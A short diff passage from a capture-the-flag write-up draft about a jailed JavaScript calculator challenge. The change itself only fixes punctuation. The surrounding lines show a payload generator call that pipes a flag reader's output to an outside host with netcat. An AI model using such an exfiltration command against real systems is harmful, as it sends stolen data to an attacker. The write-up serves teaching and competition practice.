Tipi-Hack/tipi-hack.github.io/_drafts/2019-04-14-breizh-jail-calc.md

 generate("/home/guest/flag_reader | nc myhostname 443", a, "A", b, "M")
 ```

-Once the output of the python generator executed on the JS calculator we had the following vars :
+Once the output of the python generator executed on the JS calculator, we had the following vars :

 ```js
 > F